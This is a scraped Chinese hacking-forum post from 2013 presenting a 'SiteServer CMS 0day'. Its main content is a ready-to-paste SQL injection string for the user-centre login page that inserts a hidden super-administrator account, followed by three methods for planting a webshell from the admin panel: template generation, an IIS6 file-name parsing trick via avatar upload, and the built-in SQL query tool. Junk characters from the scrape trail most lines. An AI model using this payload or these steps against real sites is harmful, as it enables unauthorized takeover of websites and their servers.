找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1995|回复: 0
打印 上一主题 下一主题

SiteServer CMS 0Day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:10:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
经测试秒杀最新的3.5版. U  m# U& J* R- E

& {8 b+ r. g: y2 z6 W$ ?1 t; Xstieserver官网:www.siteserver.cn
5 A: M4 X: X9 f- \1 h/ F9 j4 q$ @+ p: q0 x5 p) b) E
: Q+ g5 D  }4 k

5 Z+ ?) _: k: P& lEXP:
# S, D  k9 }3 @; P, w2 H0 x- L: K& m( y7 l5 J7 ?/ V3 S
直接访问UserCenter/login.aspx' I$ L4 D3 {& H( G2 H
8 k' w2 W1 u, l+ X
& y, V. k. i; t; |. k- f3 v0 x

: m* V5 [# Q! G5 q% l4 a用户名处输入:
9 K; v6 A) e( B! J, U( R8 A
7 i6 h6 r$ R. @- M) E123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--+ K3 c$ }$ _! B* s5 g* _
6 R" P7 ~$ c! b% F. V2 O+ l

6 g6 C6 W* |* m$ o- F
2 L( Y5 p( j  c; o& c7 @密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
1 h, m5 Z7 [0 p: Y$ O  t) ?9 Z
. l" v7 ^. P# Z* C& X 4 ]$ B- r" \; d& B+ @- Z
' g' f4 X! l% V$ L0 X
之后再访问后台SiteServer/login.aspx用插入的用户登陆
7 W$ T' X2 i' Q: S  @
" ], n/ B5 ~' G & y# I4 b! y+ J; E1 \5 u
; I/ h# Y- `& t7 _! r: c
后台拿webshell的三种方法:- t, h7 i  Z* n0 Y

0 _. t) k# H4 F- z一、5 ?5 l" R+ R+ s3 I3 O. J

0 R" G  d! `5 L% y1 S站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx. t! _# Y2 f$ }4 W% [& u& ~
, W4 ?* ^" O+ {, n1 T3 ]
二、
3 \! L& b1 [8 \/ y# D) a% ^5 ^+ I5 D4 X) @
成员权限-》添加用户-》用户名为:1.asp
- G1 O1 r- A6 a/ L( F; n
. r2 F$ M& ^% _8 T% a  ehttp://127.0.0.1/usercenter/
+ W. V0 W' h" @# n/ H) [& r9 D# r; O  W$ h; l
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell. O" ?" p8 d0 o" O

' ~/ G" x( q' _* D- T(ps:后台添加用户时不会验证是否含有非法字符)# d+ i2 M3 `( A! F8 m3 n
- O7 Q# F& E# D+ ^. ]
三、
& k* h+ }5 P- {  z4 K. w
6 E" j5 \6 F3 O6 d7 @4 W系统工具-》实用工具-》机器参数查看% J/ D! n. }4 [+ \  F
可以看到数据库类型、名称,WEB路径
% J9 p# v9 W; k$ }5 P% C- _3 v" L& q3 G
系统工具-》数据库工具-》SQL语句查询
; I( \. Z6 u( X+ ^9 o这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。0 z; e8 t+ b8 w- p( ~% ^- i$ D" ^. m
! D8 E* K' S6 ^
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表